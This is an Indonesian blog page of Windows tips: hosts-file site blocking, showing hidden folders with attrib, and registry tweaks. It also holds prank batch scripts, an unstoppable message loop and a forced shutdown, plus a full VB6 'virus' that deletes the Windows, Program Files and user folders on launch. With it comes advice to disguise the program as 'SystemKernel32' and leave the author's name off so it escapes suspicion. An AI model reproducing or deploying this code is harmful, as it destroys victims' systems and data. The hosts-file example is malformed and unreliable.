Tip’s and trik’s computer

Memblokir website tanpa software

Langsung aja, buka folder C:\WINDOWS\system32\drivers\etc, di situ ada file dengan nama hosts. Buka file tersebut dengan notepad, di dalamnya terdapat teks seperti ini:
127.0.0.1 localhost

Tambahkan saja di bawahnya dengan website yang ingin kamu blokir, misalnya http://www.plasa.com dan m3-access.com, sehingga menjadi seperti ini:

127.0.0.1 localhost
127.0.0.2 http://www.plasa.com
127.0.0.3 m3-access.com

Kalo masih kurang, tambahin lagi aja di bawahnya dengan 127.0.0.4, 127.0.0.5, 127.0.0.6, dan seterusnya. Kalo udah, jangan lupa di-save. Gampang kan?

Coba aja buka website yang udah kamu blokir, dengan Firefox, IE, atau Opera, atau apalah, bener-bener nggak bisa dibuka kan? Semoga saja hal ini bisa bermanfaat, agar keluarga dan teman² kita tidak terjerumus di situs² ilegal, porno, dsb 😀

sumber artikel : http://sanjisan.wordpress.com

menampilkan folder yang hilang (hidden)

kita sering mengira folder kita hilang tanpa kita edit atau hapus..kita mengira folder kita hilang karena virus.

Sebenarnya Folder Tersebut tidak hilang, tapi sembunyikan sebagai system
bisa dilihat dengan cara
1. Buka windows explorer
2. Klik Tools ==> Folder Options ==> View ==> pilih Show hiden File dan
Folders==>
Hilangkan centang Hide Protected Operating System (recomended)
3. OK ==> Folder2 yang menghilang akan tampak kembali.

Untuk membuka Folder ini agar tidak terhiden lagi lakukan langkah berikut
1. Buka Run ==> Ketik CMD
2. Setelah Mode Command Promp Terbuka lakukan perintah berikut di cmd trsebut
3. Ketik : Attrib -h -s *.* /s /d Terus Enter
4. lakukan cara ini pada semua Drive Misal D, E, F dst
5. Untuk berpindah antar Drive gunakan perintah sesuai Dive nya misal F.. ketik
F: Tekan enter dan lakukan no 3.

contoh ketikkan D : jika kita ingin melakukan perintah ini di drive D kemudian enter

kemudian ketikkan Attrib -h -s *.* /s /d

message terus menerus

1.message yang muncul terus menerus

buka notepad trus ketikan neh

@ECHO off :Begin

msg * aih maapkan si ibeh neh

msg *yg sok pNdai

msg * si ibeh dah ngerusakin komputer loe mua

msg * n fga tau bagusin’a lg

msg * biar masalah nya kelar

msg *instal ulang z

GOTO BEGIN

save namafile.BAT ket: jika di kill task manager,masih tetep muncul message nya kata2 nya bisa diganti sesuai selera masing2…

.. 2.bikin shutdown+message

@echo off

msg * apaan sih lo shutdown -s -c “Error! si ibeh gila datang”

save namafile.BAT

belajar visual basic

ingin belajar visual basic?

silahkan klik disini
selamat mencoba..

Bikin Virus Kejam Tanpa Terdeteksi Antivirus

Nih cara buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple gt

Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB

lanjut …..

cara Bikin Virus cman 1 mnt

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32?)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…

Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…
4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32? jadi ga bakal dicurigain
5. Jangan pernah naroh nama lu di nih virus… k?
6. compile deh… slese!

Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.

ingin udah file pdf 2 word?
download dulu software’a disini

Bermain dengan REGEDIT OS Windows

Trik ini diperuntukkan bagi orang-orang yang mau mencoba, mau membaca, dan pemula. Bagi kaum “expert” juga boleh membaca karena itu hak anda :-), dan bila perlu lewatin aja karena ini jauh di bawah keahlian anda, hehehehe peace. Kalau ga suka jangan di baca apalagi mencoba, karena berbahaya jika tidak di baca betul.

Regedit adalah salah satu sistem yang diterapkan di dalam sistem operasi Windows. Regedit bekerja dengan menggunakan angka biner dan hexadesimal (kalo ga salah). Cara membuka regedit ini gampang, seperti ini :

Klik : Start > Run (muncul box Run) , ketikkan kata “regedit” bisa kapital maupun non kapital.

Regedit memiliki kemampuan-kemampuan rahasia yang belum anda kenal (bagi yang baru tau). Kemampuan itu dapat anda lihat pada daftar di bawah ini, berikut dengan petunjuk aktifasinya. Selamat mencoba..

Mengganti Nama Recycle Bin

Nama “Recycle Bin” temasuk ke dalam salah satu apliaksi yang tidak bis di ganti namanya. Kalau tidak percaya, coba aja dengan mengklik kanan Icon Recycle Bin pada Desktop, carilah opsi rename-nya. Ga bakalan nemu deh… Nah berikut ini adalah string yang digunakan dalam mengganti nama Recycle Bin itu, selamat mencoba.

HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}

Klik ganda pada option (Default value) dan beri nama baru sesuai keinginan anda pada Value Data.

Menunjukkan File Hidden Operating System

Biasanya setiap orang memiliki privasi tersendiri di dalam komputernya. Untuk itu dilakukan berbagai cara dalam menyenbunyikan folder-folder yang dianggap pribadi atau berisi #$@%^&&. Salah satu cara yang digunakan adalah “Hide Operating System ” yang dilakukan melalui DOS. Salah satu cara “lagi” yang digunakan dalam menampilkan file yang “superhiden” ini adalah Regedit, selain dengan DOS itu sendiri. So, try this one :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Buat sebuah DWORD Value baru dan beri nama ShowSuperHidden. Klik ganda ShowSuperHidden dan masukkan angka 1 pada Value Data.

Otomatis Mematikan Aplikasi yang Not Responding

Kemampuan ini dapat dilakukan untuk mematikan secara otomatis program-program yang “not responding”. Walau terkadang “kaga” bekerja, hehehe, tapi apa salahnya di coba….

HKEY_CURRENT_USER\Control Panel\Desktop

HKEY_USERS\.DEFAULT\Control Panel\Desktop

Klik ganda AutoEndTasks dan masukkan angka 1 pada Value Data.

Atau

HKEY_USERS/.DEFAULT/Control Panel/Desktop

Klik ganda AutoEndTasks dan masukkan angka 1 pada Value Data.

Kotak Dialog Sebelum Logon

Mau ngerjain orang? Trik ini dapat diandalkan. Kemampuan string ini adalah menampilkan kotak dialog yang berisi judul berikut isinya sebelum Log On Windows. Judul dan Isi Dialog Box dapat diisi sesuai dengan keinginan anda. Cobain aja string ini…

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Klik ganda LegalNoticeCaption dan masukkan input teks judul yang diinginkan (contoh: Virtus Alert).

Klik ganda LegalNoticeText dan masukkan input teks (isi) yang diinginkan (contoh: This computer have been infected by panicattack virus).

Menonaktifkan Fungsi AutoRun

Fungsi string ini dapat diandalkan karena banyaknya virus yang berkembang melalui “autorun”. Matikan fungsi menu autorun komputer anda. Sehingga setiap flashdisk yang ter”cucuk” tidak akan dapat berjalan melalui autorun.

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer

Klik ganda NoDriveTypeAutoRun dan masukkan angka 95 pada Value Data.

Membersihkan Recent Documents

Recent dokumen berguna untuk meninjau kembali setiap file terakhir yang anda buka. Jika komputer digunakan oleh banyak orang (like komputer tempat kos-kosan) pengguna terakhir akan berupaya mengapus file-file recent yang pernah dibukanya, apalagi file itu foto ceweknya, hihihihihi. Supaya mudah cobain aja string ini.

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer

Buat sebuah DWORD Value baru dan beri nama NoRecentDocsHistory.

Klik ganda pada NoRecentDocsHistory dan masukkan angka 1 pada bagian Value Data.

Menyembunyikan My Recent Documents

(sambungan cara di atas) Lakukan trik awal dengan string berikut, sehingga Link “My Recent Document” akan hilang dari menu Start anda….

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced

Klik ganda pada Start_ShowRecentDocs dan masukkan angka 0 pada Value Data.

Ending :

Terkadang beberapa string tidak ditemukan atau tidak dapat bekerja sebagaimana mestinya.. balum ada jawaban pasti mengenai masalah ini. Yang jelas, cobain aja dulu..dan yang terpenting lagi adalah belajar. Untuk mngetahui rahasia lainnya, kunjungi aja : http://ilmukomputer.com ketikan “abe-registry” pada menu search..

Selamat mencoba, jika terjadi kesalahan, lakukan lagi percobaannya. Atau bertanya di forum IT, atau blog ini….

created by ibeh bandito…

ym : ibeh_bandito

Iklan
Telah Terbit on Juni 6, 2009 at 4:00 pm  Tinggalkan sebuah Komentar  

The URI to TrackBack this entry is: https://ibehbandito.wordpress.com/tips-and-triks-computer/trackback/

RSS feed for comments on this post.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: